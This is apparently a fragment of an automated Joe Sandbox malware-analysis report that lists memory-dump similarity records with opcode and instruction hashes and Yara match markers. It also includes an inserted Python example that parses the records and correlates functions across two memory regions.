                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: BC
                                                                                                                                                                                                              • API String ID: 0-447861928
                                                                                                                                                                                                              • Opcode ID: dec412dcfa3550e1358a8910529bf19242c3aa3118780d88fee628136254cd37
                                                                                                                                                                                                              • Instruction ID: 0279393a92a61bba79e7c86748a4d6ae5f7cb36825c8a0fd67d57484002d8203
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dec412dcfa3550e1358a8910529bf19242c3aa3118780d88fee628136254cd37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6051BD39219342CFE7048F79E88426BB7E1FB8B310F499D7DE48683291D3349845EB19
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 6
                                                                                                                                                                                                              • API String ID: 0-1604402223
                                                                                                                                                                                                              • Opcode ID: 51daf835812adcfe657573e2539a1ff1a3683370723952fa6ea572c7613dcc69
                                                                                                                                                                                                              • Instruction ID: 61842809c40303e4e4db7b177179f5f566b8d7e6a4561ab81124387da425e21d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51daf835812adcfe657573e2539a1ff1a3683370723952fa6ea572c7613dcc69
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E51E37365C7218BD324CE69984234FBBE2EBC4304F46892DD5E5DB281DA78C9068782
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: {_k<
                                                                                                                                                                                                              • API String ID: 0-1409048551
                                                                                                                                                                                                              • Opcode ID: f7f6514b334752bd8817cf84b044d8f3c9c1c11c769cb32ea6c24945ddf89a0c
                                                                                                                                                                                                              • Instruction ID: 44bfdf24b79543abe8c7caa06ff56f9fd9ce70014129c793e7c3522adb0cf6f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7f6514b334752bd8817cf84b044d8f3c9c1c11c769cb32ea6c24945ddf89a0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3418D3410C7D28ADB35CF3980647BABFE1AF9B254F18589EC4DA9B292DB354147CB12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: {_k<
                                                                                                                                                                                                              • API String ID: 0-1409048551
                                                                                                                                                                                                              • Opcode ID: f7f6514b334752bd8817cf84b044d8f3c9c1c11c769cb32ea6c24945ddf89a0c
                                                                                                                                                                                                              • Instruction ID: 0d4b58cd6c3534cf5e148380d3c7a1bd99a82ca465dc628dbe5d1dc0ba68ddc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7f6514b334752bd8817cf84b044d8f3c9c1c11c769cb32ea6c24945ddf89a0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941C46410C3E29BDB358F3590647BBBBE1AF97340F58589EC4C95B292CB384447CB56
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                                              • Opcode ID: 1dfc0a29198ecf2e54a63cdb79157cbbdd024ec78eaa5f66b597b58492d313c1
                                                                                                                                                                                                              • Instruction ID: b0c2d462f281ace9c3e23cfd1bc146a3a88531ac41f25a87b0489d47a7f2ccda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dfc0a29198ecf2e54a63cdb79157cbbdd024ec78eaa5f66b597b58492d313c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B4112B2A042008BDB19CF24C8457ABB7E2FF85319F19912DD9955B390E7359C08CBD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U
                                                                                                                                                                                                              • API String ID: 0-2646364814
                                                                                                                                                                                                              • Opcode ID: f0830becc6fb0e80688fe0f0debda23e13204af4fb353c1acbe474b084b8fa1f
                                                                                                                                                                                                              • Instruction ID: 00d24beec9f6f37365afe8fef71284fa12cf8d1e63289b1f6d53d731536486a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0830becc6fb0e80688fe0f0debda23e13204af4fb353c1acbe474b084b8fa1f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97510933F055658FC729CB7C89A02EEBBB2AF55220F59029ED595A73D2D6704841CB41
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: jW}U
• API String ID: 0-2646364814
• Opcode ID: 11c1642d8baa07b671b599e0244b6b0fc1bd82bae1604d9694f328d29f49cf9a
• Instruction ID: d620fccbfc2fc586797828fa9f3a26124ee5ba5b901785d09d514e84171115ee
• Opcode Fuzzy Hash: 11c1642d8baa07b671b599e0244b6b0fc1bd82bae1604d9694f328d29f49cf9a
• Instruction Fuzzy Hash: DD512B32F055558FCB19CA7C88A02EEBBB26B5A320F1D02DED8E5A73D2C6744901DF45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: .' a
• API String ID: 0-4086964760
• Opcode ID: 4aa288fc6381a6f93aafbeb665eb7f7c5de6b69c39edded857da270065205aa5
• Instruction ID: 57b172fce1b1d7d9f14527a79b4538c94a3a9079eea6c4d313fbfe1d312fe9e5
• Opcode Fuzzy Hash: 4aa288fc6381a6f93aafbeb665eb7f7c5de6b69c39edded857da270065205aa5
• Instruction Fuzzy Hash: 3131663AA087048BD310DF69C88476BB7E1EBA4308F14847EE4849B381D3B58845CB95
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: .' a
• API String ID: 0-4086964760
• Opcode ID: b15fd9f4810afe40f059f025bc7a65a714b26578a53e0b2d32c067522c84a98a
• Instruction ID: 248bc579583c6b93a3bf7eaa2133537c18410c79fffac705a3c6d50a7bdc662c
• Opcode Fuzzy Hash: b15fd9f4810afe40f059f025bc7a65a714b26578a53e0b2d32c067522c84a98a
• Instruction Fuzzy Hash: E6314632A083049BD310DF69D88476BB7E1EB89318F28D87EE5849B381D3798C458BD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: 567
• API String ID: 0-945689207
• Opcode ID: 59b89f6aaf96ba04c26e5ba2c84825d4e2f56b21392d1b4ddfe96e5dff903902
• Instruction ID: c63d9c29c58b101bd0fa051cd97a26583a752cd09524a33208c7c0aac82d51fb
• Opcode Fuzzy Hash: 59b89f6aaf96ba04c26e5ba2c84825d4e2f56b21392d1b4ddfe96e5dff903902
• Instruction Fuzzy Hash: D9314C719053418BD308CF25C86237BB7F2EBC6218F14896ED4D9AB384D778C805DB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 36d2fcec877f6f85e9199b0f71820fb2dab8487c5eddc6faba8c504460bfd080
• Instruction ID: 05e8ff41e9a626ae34b7a78e66eb95737fa4a833a8bdccaedff58a19d9da3817
• Opcode Fuzzy Hash: 36d2fcec877f6f85e9199b0f71820fb2dab8487c5eddc6faba8c504460bfd080
• Instruction Fuzzy Hash: C631E0721083059FC318DF68D8D1A6BBBF5FFA5314F15883EE68587290E3369908CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: 567
• API String ID: 0-945689207
• Opcode ID: 59b89f6aaf96ba04c26e5ba2c84825d4e2f56b21392d1b4ddfe96e5dff903902
• Instruction ID: cb70dc1c3e3627e86a7c7220618dcff2e64c31194553c04810119f0c5c690fec
• Opcode Fuzzy Hash: 59b89f6aaf96ba04c26e5ba2c84825d4e2f56b21392d1b4ddfe96e5dff903902
• Instruction Fuzzy Hash: 8F314C71A053018BD708CF25C86237BB7F2EBC6314F149A6ED4D9AB384D638C805CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: &d&U
• API String ID: 0-857500253
• Opcode ID: 99c6848596b19fd9c0795a8548c7a1f1dab2b9b0eddb2cf766e02dda6b88160a
• Instruction ID: 73b52e6a6652f6aff228a101bc3a27c04c1dc54ba25291ef39f8c70feacd0583
• Opcode Fuzzy Hash: 99c6848596b19fd9c0795a8548c7a1f1dab2b9b0eddb2cf766e02dda6b88160a
• Instruction Fuzzy Hash: 7F31F475E002518BDB49CF79ECA05AEBBB1FF1B320B18857EC851A7392D6318841CF94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: &d&U
• API String ID: 0-857500253
• Opcode ID: c4ce6e40bb4074ea86165672eee4d5124439793ad0d06e6da85785d8ac2ebf6e
• Instruction ID: 8e531ad3b95b44aecdd120331e6cd5f1cae3cc121926a116e0ba4bbd640eba3e
• Opcode Fuzzy Hash: c4ce6e40bb4074ea86165672eee4d5124439793ad0d06e6da85785d8ac2ebf6e
• Instruction Fuzzy Hash: 963133B5E002119BDB08CF79EC905AEBBB1EF0B314B19956DD852B7382D6349842CB98
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: bVa>
• API String ID: 0-1709045211
• Opcode ID: 26d25b7c19a97ad12516b0ebb9e689ed076934d6bf64749ff3658b336983511e
• Instruction ID: 79cdf0d98bff44c6bc60f3bac41b7d76730289d1fad696120a9343c4b40e6f35
• Opcode Fuzzy Hash: 26d25b7c19a97ad12516b0ebb9e689ed076934d6bf64749ff3658b336983511e
• Instruction Fuzzy Hash: 02316932A087514FC31CCE798C9215BFAD29BD9320F1A873EDDA2C73C1D97889098781
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: bVa>
• API String ID: 0-1709045211
• Opcode ID: 5f2a9e0990e2a6258d8d12edf643512654038d49b22d36be26d352134ebcb20e
• Instruction ID: b9a4dcb2db5d5f897c67cd4aaff2388118c9229c5e6ff22b28c29d4846133f24
• Opcode Fuzzy Hash: 5f2a9e0990e2a6258d8d12edf643512654038d49b22d36be26d352134ebcb20e
• Instruction Fuzzy Hash: 8F316C726087514FC31CCE798C9215BFAD29BD9320F1A873EDDA2C73C1D97889094781
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Q6
                                                                                                                                                                                                              • API String ID: 0-1919561641
                                                                                                                                                                                                              • Opcode ID: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
                                                                                                                                                                                                              • Instruction ID: f791d0773c8aa6a069076e083c77398449f5e13c7ccfc5be9ddbd7de45a7723f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D05EF5D002009BD214DB21DC82836B372AF8B204705143CC907A3300D661F5519A2A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Q6
                                                                                                                                                                                                              • API String ID: 0-1919561641
                                                                                                                                                                                                              • Opcode ID: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
                                                                                                                                                                                                              • Instruction ID: 483ebc9def7e6d9290d4defd3c5cd559621d09c7c3a64afdb335fda8debab05c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D05EF9E006018BC214DB21E882836B3715B8B30C705143CE507E3302D734F455962E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9b7c53839fb59285727816652aa49a4fc886710fd0160d644cfe08574288bdf2
                                                                                                                                                                                                              • Instruction ID: c2a34166331ab1bf06113db1029093a6526019f45ee7e3b15e7513dfd3681744
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b7c53839fb59285727816652aa49a4fc886710fd0160d644cfe08574288bdf2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B52C0B0908B848FE731CB34C8843E7BBE6AB41314F55896FD5FA06B82D379A585CB15
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
                                                                                                                                                                                                              • Instruction ID: 6aa27efd6fb02c121cff326ead85f16ea75937ea046977a4f2502c4fb2bc66c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C22C132A083118BD725DF18D9806BBF3E2FFC4319F59892ED99697381D734A851CB82
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
                                                                                                                                                                                                              • Instruction ID: cbe0b1fce84b117dcb00b05b5baa364a149f9cb19e0d82db537a25c3d7385d70
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F922A231A0C7118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B87
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fdf09d19e926351616eb7806970a8a98f9659c04e16459fc426603a51009ff53
                                                                                                                                                                                                              • Instruction ID: 0ff0d648267e9a1f4b59cc6c8c4c0135a67e6a7e7c7b367b612c7bf9b6f8b0d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdf09d19e926351616eb7806970a8a98f9659c04e16459fc426603a51009ff53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F73212B0515B118FC368CF29C6905AABBF2FF45610B504A6ED6A78BF90D736F485CB10
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 302b9674059dbd5bd133ec76e48dc83cc308ae394b64c301f6ebaaabf943ca67
                                                                                                                                                                                                              • Instruction ID: 075ccdc471e4153a145f453031a36897e87c8164b64400b14f03330a12718cf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302b9674059dbd5bd133ec76e48dc83cc308ae394b64c301f6ebaaabf943ca67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E412C5356483408FD718CF29C88176AFBE6EFC9308F58986DE4958B351DA76D806CB92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6c563e5a9962c514c342f0bef627c04c4a92850a1c24d7299648411fa08f2357
                                                                                                                                                                                                              • Instruction ID: e083915bac716496f417a8268678c27cad32e376e2401c2509bfe26479332623
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c563e5a9962c514c342f0bef627c04c4a92850a1c24d7299648411fa08f2357
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0212E9356087408FD718CF29C88176BFBE6EFC9304F18886DE48597391DA7AD906CB86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 735f4f9ac98596cc6b4968084b64b450a3c10b97e8eaa4a425c1e481f216ac4d
                                                                                                                                                                                                              • Instruction ID: 496e78b978d05d042b957c0a957cb1a3f364003606dde1d626a659ca25bf0f81
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 735f4f9ac98596cc6b4968084b64b450a3c10b97e8eaa4a425c1e481f216ac4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDD15972A043408BDB18CF298C8266BBB97EFC5214F5AC53EE8459B385E735D906CB91
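The similarity records above repeat the same Opcode ID in two different memory dumps: the mapped PE image at 0x00400000 and the non-PE region at 0x02470000, which is the dump that carries the Yara matches. The parser below is an editor's example, not part of the Joe Sandbox report or its IDA plugin: it reads the records in the layout rendered on this page (three of them are copied verbatim as the embedded sample input) and groups them by Opcode ID, so a practitioner can list which functions occur in both dumps and which only in the region that was flagged. The function names and the `yara` flag are the editor's own.

```python
"""Correlate Joe Sandbox IDA-plugin similarity records across memory dumps.

Editor's example. Assumed record layout (as rendered on the report page):
a "Memory Dump Source" line opens each record, "Yara matches" appears only
on records from dumps with Yara hits, and fields are "• Key: value" lines.
"""
import re
from collections import defaultdict

# Three records copied from the report above (two dumps of one function,
# plus one function seen only in the non-PE region at 0x02470000).
RECORDS = """\
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: Q6
• API String ID: 0-1919561641
• Opcode ID: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
• Instruction ID: f791d0773c8aa6a069076e083c77398449f5e13c7ccfc5be9ddbd7de45a7723f
• Opcode Fuzzy Hash: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
• Instruction Fuzzy Hash: C9D05EF5D002009BD214DB21DC82836B372AF8B204705143CC907A3300D661F5519A2A
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: Q6
• API String ID: 0-1919561641
• Opcode ID: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
• Instruction ID: 483ebc9def7e6d9290d4defd3c5cd559621d09c7c3a64afdb335fda8debab05c
• Opcode Fuzzy Hash: 511f557a9321609686b6437b0b2735a92ee65ee0f37973002abc18c657831f43
• Instruction Fuzzy Hash: F9D05EF9E006018BC214DB21E882836B3715B8B30C705143CE507E3302D734F455962E
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fdf09d19e926351616eb7806970a8a98f9659c04e16459fc426603a51009ff53
• Instruction ID: 0ff0d648267e9a1f4b59cc6c8c4c0135a67e6a7e7c7b367b612c7bf9b6f8b0d1
• Opcode Fuzzy Hash: fdf09d19e926351616eb7806970a8a98f9659c04e16459fc426603a51009ff53
• Instruction Fuzzy Hash: F73212B0515B118FC368CF29C6905AABBF2FF45610B504A6ED6A78BF90D736F485CB10
"""


def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"yara": False}
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line == "Yara matches":
            cur["yara"] = True          # this dump had Yara hits
        elif line.startswith("•"):
            key, _, val = line[1:].partition(":")
            cur[key.strip()] = val.strip()
    return records


def dump_label(rec):
    """'0x<offset> (PE image|non-PE region)' taken from the Source File field."""
    m = re.search(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)", rec["Source File"])
    kind = "PE image" if m.group(2) == "true" else "non-PE region"
    return f"0x{m.group(1)} ({kind})"


def correlate(records):
    """Map Opcode ID -> list of (dump label, Instruction ID, yara flag)."""
    by_opcode = defaultdict(list)
    for rec in records:
        by_opcode[rec["Opcode ID"]].append((dump_label(rec), rec["Instruction ID"], rec["yara"]))
    return dict(by_opcode)


def shared_functions(records):
    """Opcode IDs seen in more than one dump (same code at two base addresses)."""
    return sorted(op for op, hits in correlate(records).items()
                  if len({h[0] for h in hits}) > 1)


if __name__ == "__main__":
    recs = parse_records(RECORDS)
    for op, hits in correlate(recs).items():
        print(op[:16], "shared" if len({h[0] for h in hits}) > 1 else "single")
        for label, insn, yara in hits:
            print("   ", label, insn[:16], "yara" if yara else "")
```

For the `Q6` function the Opcode ID and Opcode Fuzzy Hash are identical in both dumps while the Instruction ID and Instruction Fuzzy Hash differ; reading that as the same code present at two base addresses is the editor's interpretation, not something the report states.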
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
